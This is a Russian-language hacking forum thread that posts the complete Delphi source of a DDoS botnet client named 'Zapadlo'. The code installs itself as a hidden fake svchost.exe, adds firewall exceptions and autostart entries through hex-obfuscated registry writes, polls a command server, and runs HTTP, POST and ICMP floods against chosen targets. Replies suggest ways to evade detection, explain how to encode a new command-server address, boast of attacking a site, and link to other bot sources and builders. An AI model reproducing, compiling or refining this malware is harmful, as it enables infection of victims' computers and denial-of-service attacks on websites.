Source Code DDoS BotNet "Zapadlo"

[zapadlo]

Source Code DDoS BotNet "Zapadlo" Данный бот так и не был реализован. Дабы не пропадать добру, выкладываю Source Code и соответственно Admin Panel. Думаю, народу, будет в чём поковыряться и над чем подумать. Сурс комментариев не требует, и так всё понятно до мелочей, а кому не понятно - вам тут делать не хрен. Авторы: C00LPack and me. Как вы наверное заметили, AP Должна быть в HEX.

Код:

 program zapadlo;  uses   SysUtils, Classes, Windows, ShellAPI, Pingsend, Httpsend;  type   TNewThread = class(TThread)   private   protected     procedure Execute; override;   public   end;  var   mThread: LongWord;   admhex: string =   'AdminPanel';   WorkFolder: string;   work: boolean;   thread, i :integer;   tip, port, target: string;   postdata: string;  const   Packets: array[1..4] of integer = (128, 256, 512, 1024);   Referers: array[1..20] of string = (   'http://google.com/',   'http://yandex.ru/',   'http://gigporno.ru/',   'http://yahoo.com/',   'http://votrube.ru/',   'http://rambler.ru/',   'http://sex4porno.ru/',   'http://spaces.ru/',   'http://host-tracker.com/',   'http://forum.antichat.ru/',   'http://lenta.ru/',   'http://wikpedia.org/',   'http://hardcoreporn.com/',   'http://mail.ru/',   'http://vkontakte.ru/',   'http://upyachka.ru/',   'http://2ip.ru/',   'http://webmoney.ru/',   'http://live.com/',   'http://microsoft.com/');    UserAgents: array[1..27] of String = (   'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.0)',   'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1)',   'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2)',   'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0)',   'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.1)',   'Opera/7.51 (Windows NT 5.0; U) [en]',   'Opera/7.51 (Windows NT 5.1; U) [en]',   'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.22) Gecko/20110902 Firefox/3.6.22',   'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)',   'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.10 Safari/532.0',   'Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.9.168 Version/11.51',   'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.36 (KHTML, like Gecko) Chrome/12.0.742.53 Safari/534.36 QQBrowser/6.3.8908.201',   'Opera/7.51 (Windows NT 5.2; U) [en]',   'Opera/7.51 (Windows NT 6.0; U) [en]',   'Opera/7.51 (Windows NT 6.1; U) [en]',   'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux x86_64; ru) Opera 10.10',   'Opera/9.80 (X11; Linux x86_64; U; ru) Presto/2.2.15 Version/10.10',   'Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',   'Mozilla/5.0 (X11; U; Linux x86_64; ru; rv:1.9.0.4) Gecko/2008111611 Gentoo Iceweasel/3.0.4',   'Mozilla/1.1 (compatible; MSPIE 2.0; Windows CE)',   'Mozilla/1.10 [en] (Compatible; RISC OS 3.70; Oregano 1.10)',   'Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)',   'Googlebot',   'MSNBot',   'Yandex',   'StackRambler',   'Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0) EudoraWeb 2');  function HexToBin(Text, Buffer: PChar; BufSize: Integer): Integer; assembler; asm        PUSH    ESI        PUSH    EDI        PUSH    EBX        MOV     ESI,EAX        MOV     EDI,EDX        MOV     EBX,EDX        MOV     EDX,0        JMP     @@1 @@0:    DB       0, 1, 2, 3, 4, 5, 6, 7, 8, 9,-1,-1,-1,-1,-1,-1        DB      -1,10,11,12,13,14,15,-1,-1,-1,-1,-1,-1,-1,-1,-1        DB      -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1        DB      -1,10,11,12,13,14,15 @@1:    LODSW        CMP     AL,"0"        JB      @@2        CMP     AL,"f"        JA      @@2        MOV     DL,AL        MOV     AL,@@0.Byte[EDX-"0"]        CMP     AL,-1        JE      @@2        SHL     AL,4        CMP     AH,"0"        JB      @@2        CMP     AH,"f"        JA      @@2        MOV     DL,AH        MOV     AH,@@0.Byte[EDX-"0"]        CMP     AH,-1        JE      @@2        OR      AL,AH        STOSB        DEC     ECX        JNE     @@1 @@2:   MOV     EAX,EDI        SUB     EAX,EBX        POP     EBX        POP     EDI        POP     ESI end;  function HexToStr(s:pchar):string; begin    SetLength(Result,StrLen(s)div 2);    SetLength(Result, HexToBin(s, @result[1],StrLen(s)div 2)); end;  function TempDir: string;   var   Dir: array[0..MAX_PATH - 1] of char;   begin     GetTempPath(SizeOf(Dir), Dir);     Result := Dir; end;  function SetTheReg(key:Hkey; subkey,name,value:string): boolean; var   regKey:hkey; begin   RegCreateKey(key,PChar(subkey),regKey);   RegSetValueEx(regKey,Pchar(name),0,REG_SZ,pchar(value),length(value));   RegCloseKey(regKey); end;  function StrToHex(source: String): String; var i:integer;     c:Char;     s:String; begin     s := '';     for i:=1 to Length(source) do     begin       c := source[i];       s := s +  IntToHex(Integer(c),2);     end;     result := s; end;  {это будет стучать в админку} function ThreadFunc_MainThread( Parameter: Pointer): Integer; var   http: THTTPSend;   str: string;   fucklist: TStringList;  begin   while True do   begin     try       http:=THTTPSend.Create;       fucklist:=TStringList.Create;       http.UserAgent := UserAgents[1 + Random(27)];       http.HTTPMethod('GET', HexToStr(Pchar(admhex)) + 'bot.php?ver=1&country=Unknown');       http.Document.Clear;       http.Headers.Clear;       http.Free;       Sleep(2000);       HttpGetText(HexToStr(Pchar(admhex)) + 'command.txt', fucklist);       str:=fucklist.Strings[0];         if (Pos('http',str)0) or (Pos('rndhttp',str)0) or (Pos('icmp',str)0)           or (Pos('dwflood',str)0) or (Pos('post',str)0) or (Pos('visiturl',str)0) then             begin               tip:=Copy(str,1,Pos('=',str)-1);                {}               if tip='http' then                 begin                 tip:=Copy(str,1,Pos('=',str)-1);                 Delete(str,1,Pos('=',str));                 Target:=Copy(str,1,Pos('|',str)-1);                 thread:=StrToInt(Copy(str,Pos('|',str)+1,Length(str)));                 Sleep(10000);                 if work=false then                   begin                   work:=true;                   for i:=1 to thread do                     TNewThread.Create(false); //старт потоков                   end;                 end; //http                {}               if tip='rndhttp' then                 begin                 tip:=Copy(str,1,Pos('=',str)-1);                 Delete(str,1,Pos('=',str));                 Target:=Copy(str,1,Pos('|',str)-1);                 thread:=StrToInt(Copy(str,Pos('|',str)+1,Length(str)));                 Sleep(10000);                 if work=false then                   begin                   work:=true;                   for i:=1 to thread do                     TNewThread.Create(false); //старт потоков                   end;                 end; //http random flood              {}               if tip='icmp' then                 begin                 tip:=Copy(str,1,Pos('=',str)-1);                 Delete(str,1,Pos('=',str));                 Target:=Copy(str,1,Pos('|',str)-1);                 thread:=StrToInt(Copy(str,Pos('|',str)+1,Length(str)));                 Sleep(10000);                 if work=false then                   begin                   work:=true;                   for i:=1 to thread do                     TNewThread.Create(false); //старт потоков                   end;               end; //icmp flood                {}               if tip='dwflood' then                 begin                 tip:=Copy(str,1,Pos('=',str)-1);                 Delete(str,1,Pos('=',str));                 Target:=Copy(str,1,Pos('|',str)-1);                 thread:=StrToInt(Copy(str,Pos('|',str)+1,Length(str)));                 Sleep(10000);                 if work=false then                   begin                   work:=true;                   for i:=1 to thread do                     TNewThread.Create(false); //старт потоков                   end;               end;  //dwflood                {}               if tip='visiturl' then                 begin                 tip:=Copy(str,1,Pos('=',str)-1);                 Delete(str,1,Pos('=',str));                 Target:=Copy(str,1,Pos('|',str)-1);                 thread:=StrToInt(Copy(str,Pos('|',str)+1,Length(str)));                 Sleep(10000);                 if work=false then                   begin                   work:=true;                   TNewThread.Create(false); //старт потокa                   end;               end;                {}               if tip='post' then                 begin                 tip:=Copy(str,1,Pos('=',str)-1);                 Delete(str,1,Pos('=',str));                 Target:=Copy(str,1,Pos('?',str)-1);                 Delete(str,1,Pos('?',str));                 postdata:=Copy(str,1,Pos('|',str)-1);                 thread:=StrToInt(Copy(str,Pos('|',str)+1,Length(str)));                 Sleep(10000);                 if work=false then                   begin                   work:=true;                   for i:=1 to thread do                     TNewThread.Create(false); //старт потоков                   end;               end;  //posthttp         end         else         begin         work:=false; //вырубаем потоки         end;     except fucklist.Clear; http.Free; end;     fucklist.Clear;     sleep(300000);   end;//цикл while end;  { TNewThread - Код атаки } procedure TNewThread.Execute; var   ping: TPINGSend;   http: THTTPSend; begin   inherited;   while work do   begin    {}   if tip='http' then begin     try     Randomize;     http := THTTPSend.Create;     http.UserAgent := UserAgents[1 + Random(27)];     http.Headers.Insert(0,'Referer: '+Referers[1 + Random(20)]);     http.Timeout := 5000;     http.HTTPMethod('GET', target);     http.Free;     except http.Free; end;   end;    {}   if tip='rndhttp' then begin     try     Randomize;     http:=THTTPSend.Create;     http.UserAgent := UserAgents[1 + Random(27)];     http.Timeout  := (Random(10000));     http.KeepAliveTimeout := (Random(10000));     http.Headers.Insert(0,'Referer: '+Referers[1 + Random(20)]);     http.HTTPMethod('GET', target);     Sleep(Random(100));     http.Free;     except http.Free; end;   end;    {}   if tip='visiturl' then begin     try     Randomize;     http:=THTTPSend.Create;     http.UserAgent := UserAgents[1 + Random(27)];     http.Headers.Insert(0,'Referer: '+Referers[1 + Random(20)]);     http.HTTPMethod('GET', target);     http.Free;     work:=false;     except http.Free; end;   end;    {}   if tip = 'icmp' then begin     try     Randomize;     ping:=TPINGSend.Create;     ping.Timeout := 2000;     ping.PacketSize := Packets[1 + Random(4)];     ping.Ping(target);     ping.Free;     except ping.Free; end;   end;    {}   if tip='dwflood' then begin     try     http := THTTPSend.Create;     http.HTTPMethod('GET', target);     http.Free;     except http.Free; end;   end;    {}   if tip='post' then begin     try     http := THTTPSend.Create;     http.MimeType:='application/x-www-form-urlencoded';     http.UserAgent := UserAgents[1 + Random(27)];     http.Headers.Insert(0,'Referer: '+Referers[1 + Random(20)]);     http.Document.Write(pointer(postdata)^,length(postdata));     http.HTTPMethod('POST', target);     http.Free;     except http.Free; end;   end;     end; //цикл while end;   {Основной Код} {} begin   WorkFolder:=  TempDir +'perflib\';   if (FileExists(WorkFolder +'svchost.exe')=false) then   begin   CreateDirectory(pchar(WorkFolder),nil);   CopyFile(PChar(ParamStr(0)), pchar(WorkFolder +'svchost.exe'), true);   sleep(1000);    // SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List   SetTheReg(HKEY_LOCAL_MACHINE,   HexToStr('53595354454D5C436F6E74726F6C5365743030315C53657276696365735C5368617265644163636573735C506172616D65746572735C4669726577616C6C506F6C6963795C5374616E6461726450726F66696C655C417574686F72697A65644170706C69636174696F6E735C4C697374'),   WorkFolder + 'svchost.exe', WorkFolder + HexToStr('737663686F73742E6578653A2A3A456E61626C65643A47656E6572696320486F73742050726F6365737320666F722057696E3332205365727669636573'));    // SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List   SetTheReg(HKEY_LOCAL_MACHINE,   HexToStr('53595354454D5C43757272656E74436F6E74726F6C5365745C53657276696365735C5368617265644163636573735C506172616D65746572735C4669726577616C6C506F6C6963795C5374616E6461726450726F66696C655C417574686F72697A65644170706C69636174696F6E735C4C697374'),   WorkFolder + 'svchost.exe', WorkFolder + HexToStr('737663686F73742E6578653A2A3A456E61626C65643A47656E6572696320486F73742050726F6365737320666F722057696E3332205365727669636573'));    // Explorer Run   SetTheReg(HKEY_CURRENT_USER,   HexToStr('536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C506F6C69636965735C4578706C6F7265725C52756E'),   HexToStr('47656E6572696320486F73742050726F6365737320666F722057696E3332205365727669636573'), Workfolder + 'svchost.exe');    // Winlogon Run   SetTheReg(HKEY_CURRENT_USER,   HexToStr('536F6674776172655C4D6963726F736F66745C57696E646F7773204E545C43757272656E7456657273696F6E5C57696E6C6F676F6E'),   HexToStr('5368656C6C'), 'explorer.exe,' + Workfolder + 'svchost.exe');    FileSetAttr(WorkFolder, $00000004 or $00000002);   FileSetAttr(WorkFolder + 'svchost.exe', $00000004 or $00000002);   ShellExecute(0, 'open', pchar(WorkFolder +'svchost.exe'), nil, nil, SW_NORMAL);   Halt;   end;    if FileExists(WorkFolder +'svchost.exe') then   begin   SetLastError(0);   sleep(3000);   CreateMutex(nil, true, 'OXOOOOOOOEDD');   if GetLastError = ERROR_ALREADY_EXISTS then halt;    BeginThread(nil, 1024, @ThreadFunc_MainThread, nil, 0, mThread);   end;    while (paramstr(0) = TempDir +'\perflib\svchost.exe')=false do   begin sleep(100000); end; end.

Убедительная просьба - не пишите мне сообщения в ЛС. Я на них не отвечу. Download link: [Ссылки могут видеть только зарегистрированные пользователи.] p.s. из уважения к твоему труду "C00LPack", я удалил админки из сурса, хотя ты чужой труд не ставишь ни во что.

[KpuMuHaJl]

Ну как бы стучит :




Вес ужасный 153кб. Но бот отличный.

[masterbass]

.dcu файлы не находит)))
Приложил хоть, для приличия)

[St.Patrick]

Цитата:

Сообщение от masterbass

.dcu файлы не находит)))
Приложил хоть, для приличия)

[Ссылки могут видеть только зарегистрированные пользователи.]
распаковать сюда - C:\Program Files\Borland\Delphi7\Lib

[by_dmr]

Незнаю как бот, но код просто пиздец!

[Anonym]

zapadlo, перезалей

[WestSide]

По скрину от криминала могу сказать что панель некая смесь между оптимой и русскилом.
Покритикую код:

Цитата:

http.HTTPMethod('GET', HexToStr(Pchar(admhex)) + 'bot.php?ver=1&country=Unknown');

ИМХО лучше заменить на POST запрос, хотя бы всякие хитрожопые не будут браузером команды читать и отслеживать.

Цитата:

HttpGetText(HexToStr(Pchar(admhex)) + 'command.txt', fucklist);

Как я понял тут получаются будущие команды для бота, это лищняя нагрузка, разве пыха не может выдать команды?

Дропается в /perflib/ которую создает в TEMP'е название - svchost.exe, ИМХО палево, не каждый день увидешь svchost.exe под юзером =\

Цитата:

FileSetAttr(WorkFolder, $00000004 or $00000002);

можно было заменить на

Цитата:

FileSetAttr(WorkFolder, 6);

Почему потоки реализуются с помощью класса TThread ? Ведь проще / лучше использовать API потоки ( beginthread -> CreateThread )

Никаких проверок в боте, все ппц как уныло, пишется в Explorer/Run, даже проверок нет: удалось ли ему это сделать или нет.
Сначало пишется в HKEY_LOCAL_MACHINE потом в HKEY_CURRENT_USER, имхо лучше наоборот, в случае если прав на HKEY_LOCAL_MACHINE не хватит - бота могут локнуть, а если он до этого успеет прописаться в автозапуск под юзером и скопироваться то есть шанс что после ребута бот все таки загрузится.

Пора бы уже забить о Synapse это лишь оболочка WinSock, которая провоцирует на использование Classes и в итоге вес под 100кб, переписывайте под WinSock.
SysUtils - ни к чему тут, выдерните все функции из SysUtils.pas в код и уменьшите вес еще на ~30 - 40 кб

[WestSide]

Цитата:

Сообщение от St.Patrick

может, но опять же лень.

Цитата:

Сообщение от St.Patrick

можно было бы, но было лень)

Лень это плохо, вы хотели это в продажу пустить? - Тогда нужно было забыть о лени.

Цитата:

Сообщение от St.Patrick

проще - я бы не сказал, лучше - может быть.

А что сложного то епть?

Цитата:

var
id:longword;
begin
beginthread(0,Addr(процедура которая запустится в потоке),Addr(параметр),0,id);

[WestSide]

Цитата:

Сообщение от St.Patrick

да, я пытался сначала сделать именно так, но потом что то не получилось это в цикл запилить (ну не копировать же одну строку 100 раз, и херачедь id1-id100:LongWord как у максика. LOL), да и шлепнул TThread

Цитата:

var
id:longword;
i:integer;
begin
for i:=1 to 33 do
begin
beginthread(0,Addr(процедура которая запустится в потоке),Addr(параметр),0,id);
end;

Создает 33 потока, зачем менять id1 - id100 ? Если ты хочешь глобально работать с потоками и ставить их на паузу / стоп, тебе надо
var
id:longword;
i:integer;
ThreadID:Integer
begin
for i:=1 to 33 do
begin
ThreadID[i]:=beginthread(0,Addr(процедура которая запустится в потоке),Addr(параметр),0,id);
end;

И дальше циклами обращаться ко всем потокам, можно сделать переменную которая будет хранить в себе общее кол-во потоков типо GlobalThread:Integer; и при создании новых потоков делать Inc(GlobalThread); при убийстве Dec(GlobalThread)

[blesse]

Цитата:

Сообщение от St.Patrick

P.S. я выносил livejournal.ru с 50 ботов ^_^

Поясните неграмотному чем этот сайт "провенился" ,что на нем все мощьность ботов отражают?

[eclipse92]

как он в админку стучит?

[KpuMuHaJl]

Цитата:

Сообщение от eclipse92

как он в админку стучит?

Ссыль зашифрована в хекс ввиде:
687474703A2F2F7A617061646C6F2E636C616E7465616D2E63 6F6D2F706667666C6B6A2F
То есто если расшифровать получится следующее:
[Ссылки могут видеть только зарегистрированные пользователи.]
Заходим сюда:
[Ссылки могут видеть только зарегистрированные пользователи.]
Вписываем в поле ASCII нужную нам ссыль и папку, например:
[Ссылки могут видеть только зарегистрированные пользователи.]
И нажимаем ASCII to HEX. Получается слeдующее:
68:74:74:70:3a:2f:2f:46:75:63:6b:41:76:2e:72:75:2f :66:75:63:6b:2f
Теперь удаляем эти не кому не нужные ":" и получаем:
687474703a2f2f4675636b41762e72752f6675636b2f
Вставляем нашу зашифрованную в хексе ссылку в сорц комплим радуемся жизни ставим блеать мне спасибо!!

[dokzlo13]

а кто ленивый может зашифровать строку здесь:
[Ссылки могут видеть только зарегистрированные пользователи.]

[olegteror]

Цитата:

Сообщение от WestSide

По скрину от криминала могу сказать что панель некая смесь между оптимой и русскилом.
Покритикую код:


ИМХО лучше заменить на POST запрос, хотя бы всякие хитрожопые не будут браузером команды читать и отслеживать.


Как я понял тут получаются будущие команды для бота, это лищняя нагрузка, разве пыха не может выдать команды?

Дропается в /perflib/ которую создает в TEMP'е название - svchost.exe, ИМХО палево, не каждый день увидешь svchost.exe под юзером =\

можно было заменить на


Почему потоки реализуются с помощью класса TThread ? Ведь проще / лучше использовать API потоки ( beginthread -> CreateThread )

Никаких проверок в боте, все ппц как уныло, пишется в Explorer/Run, даже проверок нет: удалось ли ему это сделать или нет.
Сначало пишется в HKEY_LOCAL_MACHINE потом в HKEY_CURRENT_USER, имхо лучше наоборот, в случае если прав на HKEY_LOCAL_MACHINE не хватит - бота могут локнуть, а если он до этого успеет прописаться в автозапуск под юзером и скопироваться то есть шанс что после ребута бот все таки загрузится.

Пора бы уже забить о Synapse это лишь оболочка WinSock, которая провоцирует на использование Classes и в итоге вес под 100кб, переписывайте под WinSock.
SysUtils - ни к чему тут, выдерните все функции из SysUtils.pas в код и уменьшите вес еще на ~30 - 40 кб

Вообще правильные методы передачи данных свой клиент-сервер tcp установленный на серваке) палева меньше,накрайняк Irc. благо его сейчас мониторят никак почти),инфа проверенна я знаю что говорю

[lass-rock]

.dcu файлы не находит.что делать?

[assss]

Цитата:

Сообщение от lass-rock

.dcu файлы не находит.что делать?

Выкладывали же, в этой теме причём. )
[Ссылки могут видеть только зарегистрированные пользователи.]

[St.Patrick]

Цитата:

Сообщение от lass-rock

.dcu файлы не находит.что делать?

забить на это чудо-юдо

[websters]

При компиляции ошибочка В uses )

___________________________________

Проблема решена)

[POCT]

Дабы не плодить темы, запосчу тут.

Исходники Black Energy ddos bot.
Скачать: [Ссылки могут видеть только зарегистрированные пользователи.]

[chef]

POCT,

[guest88]

Полезные ссылки.
Билдер с админкой.
[Ссылки могут видеть только зарегистрированные пользователи.]

Описание от лаб. Касперского. Шаг за шагом, защитная оболочка, инфектор и тд
[Ссылки могут видеть только зарегистрированные пользователи.]

[n00b]

Цитата:

Сообщение от guest88

Полезные ссылки.
Билдер с админкой.
[Ссылки могут видеть только зарегистрированные пользователи.]

Описание от лаб. Касперского. Шаг за шагом, защитная оболочка, инфектор и тд
[Ссылки могут видеть только зарегистрированные пользователи.]

Если ты хотел вставить линк на билдер второй версии то поменяй линк, если первая то думаю не стоит заморачиваться.....